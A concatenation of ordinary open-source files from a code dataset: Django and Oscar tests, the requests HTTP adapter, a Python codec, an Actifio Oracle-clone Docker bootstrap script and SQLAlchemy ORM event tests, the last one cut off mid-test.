super(InMemoryBackend, self).__init__()
self.events = []
def send(self, event):
"""Store the event in a list"""
self.events.append(event)
@freeze_time(FROZEN_TIME)
@override_settings(
EVENT_TRACKING_BACKENDS=IN_MEMORY_BACKEND_CONFIG
)
class EventTrackingTestCase(TestCase):
"""
Supports capturing of emitted events in memory and inspecting them.
Each test gets a "clean slate" and can retrieve any events emitted during their execution.
"""
# Make this more robust to the addition of new events that the test doesn't care about.
def setUp(self):
super(EventTrackingTestCase, self).setUp()
self.recreate_tracker()
def recreate_tracker(self):
"""
Re-initialize the tracking system using updated django settings.
Use this if you make use of the @override_settings decorator to customize the tracker configuration.
"""
self.tracker = DjangoTracker()
tracker.register_tracker(self.tracker)
@property
def backend(self):
"""A reference to the in-memory backend that stores the events."""
return self.tracker.backends['mem']
def get_event(self, idx=0):
"""Retrieve an event emitted up to this point in the test."""
return self.backend.events[idx]
def assert_no_events_emitted(self):
"""Ensure no events were emitted at this point in the test."""
self.assertEquals(len(self.backend.events), 0)
def assert_events_emitted(self):
"""Ensure at least one event has been emitted at this point in the test."""
self.assertGreaterEqual(len(self.backend.events), 1)
|
globau/servo | refs/heads/master | tests/wpt/web-platform-tests/subresource-integrity/tools/list_hashes.py | 191 | from os import path, listdir
from hashlib import sha512, sha384, sha256, md5
from base64 import b64encode
import re
DIR = path.normpath(path.join(__file__, "..", ".."))
'''
Yield each javascript and css file in the directory
'''
def js_and_css_files():
for f in listdir(DIR):
if path.isfile(f) and (f.endswith(".js") or f.endswith(".css")):
yield f
'''
URL-safe base64 encode a binary digest and strip any padding.
'''
def format_digest(digest):
return b64encode(digest)
'''
Generate an encoded sha512 URI.
'''
def sha512_uri(content):
return "sha512-%s" % format_digest(sha512(content).digest())
'''
Generate an encoded sha384 URI.
'''
def sha384_uri(content):
return "sha384-%s" % format_digest(sha384(content).digest())
'''
Generate an encoded sha256 URI.
'''
def sha256_uri(content):
return "sha256-%s" % format_digest(sha256(content).digest())
'''
Generate an encoded md5 digest URI.
'''
def md5_uri(content):
return "md5-%s" % format_digest(md5(content).digest())
def main():
for file in js_and_css_files():
print "Listing hash values for %s" % file
with open(file, "r") as content_file:
content = content_file.read()
print "\tSHA512 integrity: %s" % sha512_uri(content)
print "\tSHA384 integrity: %s" % sha384_uri(content)
print "\tSHA256 integrity: %s" % sha256_uri(content)
print "\tMD5 integrity: %s" % md5_uri(content)
if __name__ == "__main__":
main()
|
ivan-fedorov/intellij-community | refs/heads/master | python/lib/Lib/encodings/johab.py | 816 | #
# johab.py: Python Unicode Codec for JOHAB
#
# Written by Hye-Shik Chang <perky@FreeBSD.org>
#
import _codecs_kr, codecs
import _multibytecodec as mbc
codec = _codecs_kr.getcodec('johab')
class Codec(codecs.Codec):
encode = codec.encode
decode = codec.decode
class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,
codecs.IncrementalEncoder):
codec = codec
class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,
codecs.IncrementalDecoder):
codec = codec
class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):
codec = codec
class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):
codec = codec
def getregentry():
return codecs.CodecInfo(
name='johab',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
|
sumanthha/fundafriend | refs/heads/master | django/conf/locale/sl/__init__.py | 12133432 | |
mdn/webalyzer | refs/heads/master | webalyzer/collected/migrations/__init__.py | 12133432 | |
lig/picket2014 | refs/heads/master | users/management/commands/__init__.py | 12133432 | |
ahmetdaglarbas/e-commerce | refs/heads/tez | tests/functional/customer/auth_tests.py | 53 | import re
from django.core import mail
from django.core.urlresolvers import reverse
from django_webtest import WebTest
from oscar.test.testcases import WebTestCase
from oscar.test import factories
from oscar.core.compat import get_user_model
User = get_user_model()
class TestAUserWhoseForgottenHerPassword(WebTest):
def test_can_reset_her_password(self):
username, email, password = 'lucy', 'lucy@example.com', 'password'
User.objects.create_user(username, email, password)
# Fill in password reset form
page = self.app.get(reverse('password-reset'))
form = page.forms['password_reset_form']
form['email'] = email
response = form.submit()
# Response should be a redirect and an email should have been sent
self.assertEqual(302, response.status_code)
self.assertEqual(1, len(mail.outbox))
# Extract URL from email
email_body = mail.outbox[0].body
urlfinder = re.compile(r"http://example.com(?P<path>[-A-Za-z0-9\/\._]+)")
matches = urlfinder.search(email_body, re.MULTILINE)
self.assertTrue('path' in matches.groupdict())
path = matches.groupdict()['path']
# Reset password and check we get redirect
reset_page = self.app.get(path)
form = reset_page.forms['password_reset_form']
form['new_password1'] = 'crazymonkey'
form['new_password2'] = 'crazymonkey'
response = form.submit()
self.assertEqual(302, response.status_code)
# Now attempt to login with new password
url = reverse('customer:login')
form = self.app.get(url).forms['login_form']
form['login-username'] = email
form['login-password'] = 'crazymonkey'
response = form.submit('login_submit')
self.assertEqual(302, response.status_code)
class TestAnAuthenticatedUser(WebTestCase):
is_anonymous = False
def test_receives_an_email_when_their_password_is_changed(self):
page = self.get(reverse('customer:change-password'))
form = page.forms['change_password_form']
form['old_password'] = self.password
form['new_password1'] = u'anotherfancypassword'
form['new_password2'] = u'anotherfancypassword'
page = form.submit()
self.assertEqual(len(mail.outbox), 1)
self.assertIn("your password has been changed", mail.outbox[0].body)
def test_cannot_access_reset_password_page(self):
response = self.get(reverse('password-reset'), status=403)
self.assertEqual(403, response.status_code)
def test_does_not_receive_an_email_when_their_profile_is_updated_but_email_address_not_changed(self):
page = self.get(reverse('customer:profile-update'))
form = page.forms['profile_form']
form['first_name'] = "Terry"
form.submit()
self.assertEqual(len(mail.outbox), 0)
def test_receives_an_email_when_their_email_address_is_changed(self):
page = self.get(reverse('customer:profile-update'))
form = page.forms['profile_form']
new_email = 'a.new.email@user.com'
form['email'] = new_email
page = form.submit()
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].to[0], self.email)
self.assertEqual(User.objects.get(id=self.user.id).email, new_email)
self.assertIn("your email address has been changed",
mail.outbox[0].body)
class TestAnAnonymousUser(WebTestCase):
is_anonymous = True
def assertCanLogin(self, email, password):
url = reverse('customer:login')
form = self.app.get(url).forms['login_form']
form['login-username'] = email
form['login-password'] = password
response = form.submit('login_submit')
self.assertRedirectsTo(response, 'customer:summary')
def test_can_login(self):
email, password = 'd@d.com', 'mypassword'
User.objects.create_user('_', email, password)
self.assertCanLogin(email, password)
def test_can_login_with_email_containing_capitals_in_local_part(self):
email, password = 'Andrew.Smith@test.com', 'mypassword'
User.objects.create_user('_', email, password)
self.assertCanLogin(email, password)
def test_can_login_with_email_containing_capitals_in_host(self):
email, password = 'Andrew.Smith@teSt.com', 'mypassword'
User.objects.create_user('_', email, password)
self.assertCanLogin(email, password)
def test_can_register(self):
url = reverse('customer:register')
form = self.app.get(url).forms['register_form']
form['email'] = 'terry@boom.com'
form['password1'] = form['password2'] = 'hedgehog'
response = form.submit()
self.assertRedirectsTo(response, 'customer:summary')
def test_casing_of_local_part_of_email_is_preserved(self):
url = reverse('customer:register')
form = self.app.get(url).forms['register_form']
form['email'] = 'Terry@Boom.com'
form['password1'] = form['password2'] = 'hedgehog'
form.submit()
user = User.objects.all()[0]
self.assertEqual(user.email, 'Terry@boom.com')
class TestAStaffUser(WebTestCase):
is_anonymous = True
password = 'testing'
def setUp(self):
self.staff = factories.UserFactory.create(
password=self.password, is_staff=True)
super(TestAStaffUser, self).setUp()
def test_gets_redirected_to_the_dashboard_when_they_login(self):
page = self.get(reverse('customer:login'))
form = page.forms['login_form']
form['login-username'] = self.staff.email
form['login-password'] = self.password
response = form.submit('login_submit')
self.assertRedirectsTo(response, 'dashboard:index')
|
archen/django | refs/heads/master | tests/admin_changelist/admin.py | 57 | from django.contrib import admin
from django.core.paginator import Paginator
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth.models import User
from .models import Event, Child, Parent, Swallow
site = admin.AdminSite(name="admin")
site.register(User, UserAdmin)
class CustomPaginator(Paginator):
def __init__(self, queryset, page_size, orphans=0, allow_empty_first_page=True):
super(CustomPaginator, self).__init__(queryset, 5, orphans=2,
allow_empty_first_page=allow_empty_first_page)
class EventAdmin(admin.ModelAdmin):
list_display = ['event_date_func']
def event_date_func(self, event):
return event.date
site.register(Event, EventAdmin)
class ParentAdmin(admin.ModelAdmin):
list_filter = ['child__name']
search_fields = ['child__name']
class ChildAdmin(admin.ModelAdmin):
list_display = ['name', 'parent']
list_per_page = 10
list_filter = ['parent', 'age']
def get_queryset(self, request):
return super(ChildAdmin, self).get_queryset(request).select_related("parent__name")
class CustomPaginationAdmin(ChildAdmin):
paginator = CustomPaginator
class FilteredChildAdmin(admin.ModelAdmin):
list_display = ['name', 'parent']
list_per_page = 10
def get_queryset(self, request):
return super(FilteredChildAdmin, self).get_queryset(request).filter(
name__contains='filtered')
class BandAdmin(admin.ModelAdmin):
list_filter = ['genres']
class GroupAdmin(admin.ModelAdmin):
list_filter = ['members']
class QuartetAdmin(admin.ModelAdmin):
list_filter = ['members']
class ChordsBandAdmin(admin.ModelAdmin):
list_filter = ['members']
class InvitationAdmin(admin.ModelAdmin):
list_display = ('band', 'player')
list_select_related = ('player',)
class DynamicListDisplayChildAdmin(admin.ModelAdmin):
list_display = ('parent', 'name', 'age')
def get_list_display(self, request):
my_list_display = super(DynamicListDisplayChildAdmin, self).get_list_display(request)
if request.user.username == 'noparents':
my_list_display = list(my_list_display)
my_list_display.remove('parent')
return my_list_display
class DynamicListDisplayLinksChildAdmin(admin.ModelAdmin):
list_display = ('parent', 'name', 'age')
list_display_links = ['parent', 'name']
def get_list_display_links(self, request, list_display):
return ['age']
site.register(Child, DynamicListDisplayChildAdmin)
class NoListDisplayLinksParentAdmin(admin.ModelAdmin):
list_display_links = None
site.register(Parent, NoListDisplayLinksParentAdmin)
class SwallowAdmin(admin.ModelAdmin):
actions = None # prevent ['action_checkbox'] + list(list_display)
list_display = ('origin', 'load', 'speed')
site.register(Swallow, SwallowAdmin)
class DynamicListFilterChildAdmin(admin.ModelAdmin):
list_filter = ('parent', 'name', 'age')
def get_list_filter(self, request):
my_list_filter = super(DynamicListFilterChildAdmin, self).get_list_filter(request)
if request.user.username == 'noparents':
my_list_filter = list(my_list_filter)
my_list_filter.remove('parent')
return my_list_filter
class DynamicSearchFieldsChildAdmin(admin.ModelAdmin):
search_fields = ('name',)
def get_search_fields(self, request):
search_fields = super(DynamicSearchFieldsChildAdmin, self).get_search_fields(request)
search_fields += ('age',)
return search_fields
|
terbolous/CouchPotatoServer | refs/heads/master | libs/requests/adapters.py | 293 | # -*- coding: utf-8 -*-
"""
requests.adapters
~~~~~~~~~~~~~~~~~
This module contains the transport adapters that Requests uses to define
and maintain connections.
"""
import socket
from .models import Response
from .packages.urllib3.poolmanager import PoolManager, proxy_from_url
from .packages.urllib3.response import HTTPResponse
from .packages.urllib3.util import Timeout as TimeoutSauce
from .compat import urlparse, basestring, urldefrag, unquote
from .utils import (DEFAULT_CA_BUNDLE_PATH, get_encoding_from_headers,
prepend_scheme_if_needed, get_auth_from_url)
from .structures import CaseInsensitiveDict
from .packages.urllib3.exceptions import MaxRetryError
from .packages.urllib3.exceptions import TimeoutError
from .packages.urllib3.exceptions import SSLError as _SSLError
from .packages.urllib3.exceptions import HTTPError as _HTTPError
from .packages.urllib3.exceptions import ProxyError as _ProxyError
from .cookies import extract_cookies_to_jar
from .exceptions import ConnectionError, Timeout, SSLError, ProxyError
from .auth import _basic_auth_str
DEFAULT_POOLBLOCK = False
DEFAULT_POOLSIZE = 10
DEFAULT_RETRIES = 0
class BaseAdapter(object):
"""The Base Transport Adapter"""
def __init__(self):
super(BaseAdapter, self).__init__()
def send(self):
raise NotImplementedError
def close(self):
raise NotImplementedError
class HTTPAdapter(BaseAdapter):
"""The built-in HTTP Adapter for urllib3.
Provides a general-case interface for Requests sessions to contact HTTP and
HTTPS urls by implementing the Transport Adapter interface. This class will
usually be created by the :class:`Session <Session>` class under the
covers.
:param pool_connections: The number of urllib3 connection pools to cache.
:param pool_maxsize: The maximum number of connections to save in the pool.
:param int max_retries: The maximum number of retries each connection
should attempt. Note, this applies only to failed connections and
timeouts, never to requests where the server returns a response.
:param pool_block: Whether the connection pool should block for connections.
Usage::
>>> import requests
>>> s = requests.Session()
>>> a = requests.adapters.HTTPAdapter(max_retries=3)
>>> s.mount('http://', a)
"""
__attrs__ = ['max_retries', 'config', '_pool_connections', '_pool_maxsize',
'_pool_block']
def __init__(self, pool_connections=DEFAULT_POOLSIZE,
pool_maxsize=DEFAULT_POOLSIZE, max_retries=DEFAULT_RETRIES,
pool_block=DEFAULT_POOLBLOCK):
self.max_retries = max_retries
self.config = {}
self.proxy_manager = {}
super(HTTPAdapter, self).__init__()
self._pool_connections = pool_connections
self._pool_maxsize = pool_maxsize
self._pool_block = pool_block
self.init_poolmanager(pool_connections, pool_maxsize, block=pool_block)
def __getstate__(self):
return dict((attr, getattr(self, attr, None)) for attr in
self.__attrs__)
def __setstate__(self, state):
# Can't handle by adding 'proxy_manager' to self.__attrs__ because
# because self.poolmanager uses a lambda function, which isn't pickleable.
self.proxy_manager = {}
self.config = {}
for attr, value in state.items():
setattr(self, attr, value)
self.init_poolmanager(self._pool_connections, self._pool_maxsize,
block=self._pool_block)
def init_poolmanager(self, connections, maxsize, block=DEFAULT_POOLBLOCK):
"""Initializes a urllib3 PoolManager. This method should not be called
from user code, and is only exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param connections: The number of urllib3 connection pools to cache.
:param maxsize: The maximum number of connections to save in the pool.
:param block: Block when no free connections are available.
"""
# save these values for pickling
self._pool_connections = connections
self._pool_maxsize = maxsize
self._pool_block = block
self.poolmanager = PoolManager(num_pools=connections, maxsize=maxsize,
block=block)
def cert_verify(self, conn, url, verify, cert):
"""Verify a SSL certificate. This method should not be called from user
code, and is only exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param conn: The urllib3 connection object associated with the cert.
:param url: The requested URL.
:param verify: Whether we should actually verify the certificate.
:param cert: The SSL certificate to verify.
"""
if url.lower().startswith('https') and verify:
cert_loc = None
# Allow self-specified cert location.
if verify is not True:
cert_loc = verify
if not cert_loc:
cert_loc = DEFAULT_CA_BUNDLE_PATH
if not cert_loc:
raise Exception("Could not find a suitable SSL CA certificate bundle.")
conn.cert_reqs = 'CERT_REQUIRED'
conn.ca_certs = cert_loc
else:
conn.cert_reqs = 'CERT_NONE'
conn.ca_certs = None
if cert:
if not isinstance(cert, basestring):
conn.cert_file = cert[0]
conn.key_file = cert[1]
else:
conn.cert_file = cert
def build_response(self, req, resp):
"""Builds a :class:`Response <requests.Response>` object from a urllib3
response. This should not be called from user code, and is only exposed
for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`
:param req: The :class:`PreparedRequest <PreparedRequest>` used to generate the response.
:param resp: The urllib3 response object.
"""
response = Response()
# Fallback to None if there's no status_code, for whatever reason.
response.status_code = getattr(resp, 'status', None)
# Make headers case-insensitive.
response.headers = CaseInsensitiveDict(getattr(resp, 'headers', {}))
# Set encoding.
response.encoding = get_encoding_from_headers(response.headers)
response.raw = resp
response.reason = response.raw.reason
if isinstance(req.url, bytes):
response.url = req.url.decode('utf-8')
else:
response.url = req.url
# Add new cookies from the server.
extract_cookies_to_jar(response.cookies, req, resp)
# Give the Response some context.
response.request = req
response.connection = self
return response
def get_connection(self, url, proxies=None):
"""Returns a urllib3 connection for the given URL. This should not be
called from user code, and is only exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param url: The URL to connect to.
:param proxies: (optional) A Requests-style dictionary of proxies used on this request.
"""
proxies = proxies or {}
proxy = proxies.get(urlparse(url.lower()).scheme)
if proxy:
proxy = prepend_scheme_if_needed(proxy, 'http')
proxy_headers = self.proxy_headers(proxy)
if not proxy in self.proxy_manager:
self.proxy_manager[proxy] = proxy_from_url(
proxy,
proxy_headers=proxy_headers,
num_pools=self._pool_connections,
maxsize=self._pool_maxsize,
block=self._pool_block)
conn = self.proxy_manager[proxy].connection_from_url(url)
else:
# Only scheme should be lower case
parsed = urlparse(url)
url = parsed.geturl()
conn = self.poolmanager.connection_from_url(url)
return conn
def close(self):
"""Disposes of any internal state.
Currently, this just closes the PoolManager, which closes pooled
connections.
"""
self.poolmanager.clear()
def request_url(self, request, proxies):
"""Obtain the url to use when making the final request.
If the message is being sent through a HTTP proxy, the full URL has to
be used. Otherwise, we should only use the path portion of the URL.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
:param proxies: A dictionary of schemes to proxy URLs.
"""
proxies = proxies or {}
scheme = urlparse(request.url).scheme
proxy = proxies.get(scheme)
if proxy and scheme != 'https':
url, _ = urldefrag(request.url)
else:
url = request.path_url
return url
def add_headers(self, request, **kwargs):
"""Add any headers needed by the connection. As of v2.0 this does
nothing by default, but is left for overriding by users that subclass
the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param request: The :class:`PreparedRequest <PreparedRequest>` to add headers to.
:param kwargs: The keyword arguments from the call to send().
"""
pass
def proxy_headers(self, proxy):
"""Returns a dictionary of the headers to add to any request sent
through a proxy. This works with urllib3 magic to ensure that they are
correctly sent to the proxy, rather than in a tunnelled request if
CONNECT is being used.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param proxies: The url of the proxy being used for this request.
:param kwargs: Optional additional keyword arguments.
"""
headers = {}
username, password = get_auth_from_url(proxy)
if username and password:
headers['Proxy-Authorization'] = _basic_auth_str(username,
password)
return headers
def send(self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None):
"""Sends PreparedRequest object. Returns Response object.
:param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
:param stream: (optional) Whether to stream the request content.
:param timeout: (optional) The timeout on the request.
:param verify: (optional) Whether to verify SSL certificates.
:param cert: (optional) Any user-provided SSL certificate to be trusted.
:param proxies: (optional) The proxies dictionary to apply to the request.
"""
conn = self.get_connection(request.url, proxies)
self.cert_verify(conn, request.url, verify, cert)
url = self.request_url(request, proxies)
self.add_headers(request)
chunked = not (request.body is None or 'Content-Length' in request.headers)
timeout = TimeoutSauce(connect=timeout, read=timeout)
try:
if not chunked:
resp = conn.urlopen(
method=request.method,
url=url,
body=request.body,
headers=request.headers,
redirect=False,
assert_same_host=False,
preload_content=False,
decode_content=False,
retries=self.max_retries,
timeout=timeout
)
# Send the request.
else:
if hasattr(conn, 'proxy_pool'):
conn = conn.proxy_pool
low_conn = conn._get_conn(timeout=timeout)
try:
low_conn.putrequest(request.method,
url,
skip_accept_encoding=True)
for header, value in request.headers.items():
low_conn.putheader(header, value)
low_conn.endheaders()
for i in request.body:
low_conn.send(hex(len(i))[2:].encode('utf-8'))
low_conn.send(b'\r\n')
low_conn.send(i)
low_conn.send(b'\r\n')
low_conn.send(b'0\r\n\r\n')
r = low_conn.getresponse()
resp = HTTPResponse.from_httplib(
r,
pool=conn,
connection=low_conn,
preload_content=False,
decode_content=False
)
except:
# If we hit any problems here, clean up the connection.
# Then, reraise so that we can handle the actual exception.
low_conn.close()
raise
else:
# All is well, return the connection to the pool.
conn._put_conn(low_conn)
except socket.error as sockerr:
raise ConnectionError(sockerr, request=request)
except MaxRetryError as e:
raise ConnectionError(e, request=request)
except _ProxyError as e:
raise ProxyError(e)
except (_SSLError, _HTTPError) as e:
if isinstance(e, _SSLError):
raise SSLError(e, request=request)
elif isinstance(e, TimeoutError):
raise Timeout(e, request=request)
else:
raise
return self.build_response(request, resp)
|
Actifio/docker-oracle-vclones | refs/heads/master | docker-bootstrap.py | 1 | # Copyright 2018 <Kosala Atapattu kosala.atapattu@actifio.com>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
# FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
# CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import os
import re
import logging
import time
import signal
import subprocess
from ptyprocess import PtyProcessUnicode
try:
from Actifio import Actifio
except ImportError:
raise ("Unable to import actifio module.")
try:
from jinja2 import Template
except ImportError:
raise ("Unable to import jinja2 Template.")
# this section extracts parameters from environment variables
act_appliance = os.environ.get('ACT_APPLIANCE')
act_user = os.environ.get('ACT_USER')
act_pass = os.environ.get('ACT_PASS')
act_appname = os.environ.get('ACT_APPNAME')
act_srchost = os.environ.get('ACT_SRCHOST')
act_targetsid = os.environ.get('ORACLE_SID')
act_orahome = os.environ.get('ORACLE_HOME')
act_orauser = os.environ.get('ORACLE_USER')
act_tnsadmin = os.environ.get('TNS_ADMIN')
myhostname = os.environ.get('HOSTNAME')
############################################################
if act_orauser is None:
act_orauser = "oracle"
if act_tnsadmin is None:
act_tnsadmin = act_orahome + "/network/admin"
# start oracle listner
lsnrctl_j2 = Template("su - {{ orauser }} -c 'ORACLE_HOME={{ orahome }} lsnrctl start'")
lsnrctl_start_cmd = lsnrctl_j2.render(orauser=act_orauser, orahome=act_orahome)
os.system(lsnrctl_start_cmd)
# define a appliance instance
appliance = Actifio(act_appliance, act_user, act_pass, verbose=True)
# look up the oracle app
oraapps = appliance.get_applications(appname=act_appname, hostname=act_srchost, appclass="Oracle")
if len(oraapps) != 1:
raise ("ERROR: not expecting to filter more than one application")
# greb the target host from /act/config
hostid = re.compile(r'^HostId\s+=\s+(.*)$')
try:
with open("/act/config/connector.conf") as configfile:
for line in configfile:
hostname_match = hostid.search(line)
if hostname_match is not None:
hostuniqname = hostname_match.group(1)
break
except IOError:
raise ("ERROR: /act/config/connector.conf is not found. Have you bind mount /act?")
# lookfor a target host
targethosts = appliance.get_hosts(uniquename=hostuniqname)
if len(targethosts) != 1:
raise ("ERROR: returned hosts are not equal to 1")
job,image = appliance.simple_mount(source_application=oraapps[0],target_host=targethosts[0], label="DOCKER CONTAINER")
while job.status == "running":
time.sleep(10)
job.refresh()
# now the job is complete
# handle to cleanup
for img in job.sourceid.split (","):
mounted_image = appliance.get_images(backupname=img)
if mounted_image[0].jobclass == "mount":
mountedimage = mounted_image[0]
# find the mount point
for folder in os.listdir("/act/mnt/"):
if os.path.isdir("/act/mnt/" + folder) and (job.jobname in folder):
if os.path.isdir("/act/mnt/" + folder + "/datafile"):
act_datamount = "/act/mnt/" + folder
elif os.path.isdir("/act/mnt/" + folder + "/archivelog"):
act_lsmount = "/act/mnt/" + folder
# run the oracle mount script
appaware_command_j2 = Template("echo Y | su - {{ orauser }} -c 'databasesid={{ orasid }};export databasesid;db_recovery_file_dest_size=50000;export db_recovery_file_dest_size;nonid=FALSE;export nonid;orahome={{ orahome }};export orahome;processes=500;export processes;redosize=500;export redosize;rrecovery=TRUE;export rrecovery;standalone=FALSE;export standalone;tnsadmindir={{ tnsadminpath }};export tnsadmindir;username={{ orauser }};export username;isrestore=false;export isrestore;isgrandchild=false;export isgrandchild;isremount=false;export isremount;imageLogOffset=1;export imageLogOffset;ischild=false;export ischild;opname=mount;export opname;/act/act_scripts/oracleclone/OracleAppMount.sh {{ orasid }} {{ orahome }} {{ datamount}}'")
appaware_command = appaware_command_j2.render(orauser=act_orauser, orasid=act_targetsid, orahome=act_orahome,
tnsadminpath=act_tnsadmin, datamount=act_datamount)
with open("/script/run.sh", "w") as script:
script.write("echo $TERM\n")
script.write("export TERM=xterm\n")
script.write("stty -a\n")
script.write("tty\n")
script.write("who\n")
script.write("set +x\n")
script.write(appaware_command)
# spin up in a subprocesses
pid = os.fork()
if pid == 0:
abort_oracle_j2 = Template("su - {{ orauser }} -c 'kill -9 -1'")
abort_oracle = abort_oracle_j2.render(orauser=act_orauser)
def unmountthemount (SignNum, frame):
os.system(abort_oracle)
appliance.unmount_image(image=mountedimage)
# register for the signals
signal.signal(signal.SIGINT, unmountthemount)
signal.signal(signal.SIGTERM, unmountthemount)
while True:
time.sleep(60)
else:
# ignore all the signals... let oracle deal with them
for sig in signal.Signals:
print(sig)
if (sig != signal.SIGKILL): signal.signal(sig, signal.SIG_IGN)
# run with a terminal
script_proc = PtyProcessUnicode.spawn(["bash", "/script/run.sh"])
while True:
print(script_proc.readline())
|
leopittelli/Django-on-App-Engine-Example | refs/heads/master | django/utils/itercompat.py | 113 | """
Providing iterator functions that are not in all version of Python we support.
Where possible, we try to use the system-native version and only fall back to
these implementations if necessary.
"""
import collections
import itertools
import sys
import warnings
def is_iterable(x):
"A implementation independent way of checking for iterables"
try:
iter(x)
except TypeError:
return False
else:
return True
def is_iterator(x):
"""An implementation independent way of checking for iterators
Python 2.6 has a different implementation of collections.Iterator which
accepts anything with a `next` method. 2.7+ requires and `__iter__` method
as well.
"""
if sys.version_info >= (2, 7):
return isinstance(x, collections.Iterator)
return isinstance(x, collections.Iterator) and hasattr(x, '__iter__')
def product(*args, **kwds):
warnings.warn("django.utils.itercompat.product is deprecated; use the native version instead",
DeprecationWarning, stacklevel=2)
return itertools.product(*args, **kwds)
|
VladKha/CodeWars | refs/heads/master | 8 kyu/Man in the west/solve.py | 1 | def check_the_bucket(bucket):
return 'gold' in bucket
|
pdufour/sqlalchemy | refs/heads/master | test/orm/test_events.py | 9 | from sqlalchemy.testing import assert_raises_message, assert_raises
import sqlalchemy as sa
from sqlalchemy import testing
from sqlalchemy import Integer, String
from sqlalchemy.testing.schema import Table, Column
from sqlalchemy.orm import mapper, relationship, \
create_session, class_mapper, \
Mapper, column_property, query, \
Session, sessionmaker, attributes, configure_mappers
from sqlalchemy.orm.instrumentation import ClassManager
from sqlalchemy.orm import instrumentation, events
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import AssertsCompiledSQL
from sqlalchemy.testing.util import gc_collect
from test.orm import _fixtures
from sqlalchemy import event
from sqlalchemy.testing.mock import Mock, call, ANY
class _RemoveListeners(object):
def teardown(self):
events.MapperEvents._clear()
events.InstanceEvents._clear()
events.SessionEvents._clear()
events.InstrumentationEvents._clear()
events.QueryEvents._clear()
super(_RemoveListeners, self).teardown()
class MapperEventsTest(_RemoveListeners, _fixtures.FixtureTest):
run_inserts = None
@classmethod
def define_tables(cls, metadata):
super(MapperEventsTest, cls).define_tables(metadata)
metadata.tables['users'].append_column(
Column('extra', Integer, default=5, onupdate=10)
)
def test_instance_event_listen(self):
"""test listen targets for instance events"""
users, addresses = self.tables.users, self.tables.addresses
canary = []
class A(object):
pass
class B(A):
pass
mapper(A, users)
mapper(B, addresses, inherits=A,
properties={'address_id': addresses.c.id})
def init_a(target, args, kwargs):
canary.append(('init_a', target))
def init_b(target, args, kwargs):
canary.append(('init_b', target))
def init_c(target, args, kwargs):
canary.append(('init_c', target))
def init_d(target, args, kwargs):
canary.append(('init_d', target))
def init_e(target, args, kwargs):
canary.append(('init_e', target))
event.listen(mapper, 'init', init_a)
event.listen(Mapper, 'init', init_b)
event.listen(class_mapper(A), 'init', init_c)
event.listen(A, 'init', init_d)
event.listen(A, 'init', init_e, propagate=True)
a = A()
eq_(canary, [('init_a', a), ('init_b', a),
('init_c', a), ('init_d', a), ('init_e', a)])
# test propagate flag
canary[:] = []
b = B()
eq_(canary, [('init_a', b), ('init_b', b), ('init_e', b)])
def listen_all(self, mapper, **kw):
canary = []
def evt(meth):
def go(*args, **kwargs):
canary.append(meth)
return go
for meth in [
'init',
'init_failure',
'load',
'refresh',
'refresh_flush',
'expire',
'before_insert',
'after_insert',
'before_update',
'after_update',
'before_delete',
'after_delete'
]:
event.listen(mapper, meth, evt(meth), **kw)
return canary
def test_listen_doesnt_force_compile(self):
User, users = self.classes.User, self.tables.users
m = mapper(User, users, properties={
'addresses': relationship(lambda: ImNotAClass)
})
event.listen(User, "before_insert", lambda *a, **kw: None)
assert not m.configured
def test_basic(self):
User, users = self.classes.User, self.tables.users
mapper(User, users)
canary = self.listen_all(User)
named_canary = self.listen_all(User, named=True)
sess = create_session()
u = User(name='u1')
sess.add(u)
sess.flush()
sess.expire(u)
u = sess.query(User).get(u.id)
sess.expunge_all()
u = sess.query(User).get(u.id)
u.name = 'u1 changed'
sess.flush()
sess.delete(u)
sess.flush()
expected = [
'init', 'before_insert',
'refresh_flush',
'after_insert', 'expire',
'refresh',
'load',
'before_update', 'refresh_flush', 'after_update', 'before_delete',
'after_delete']
eq_(canary, expected)
eq_(named_canary, expected)
def test_insert_before_configured(self):
users, User = self.tables.users, self.classes.User
mapper(User, users)
canary = Mock()
event.listen(mapper, "before_configured", canary.listen1)
event.listen(mapper, "before_configured", canary.listen2, insert=True)
event.listen(mapper, "before_configured", canary.listen3)
event.listen(mapper, "before_configured", canary.listen4, insert=True)
configure_mappers()
eq_(
canary.mock_calls,
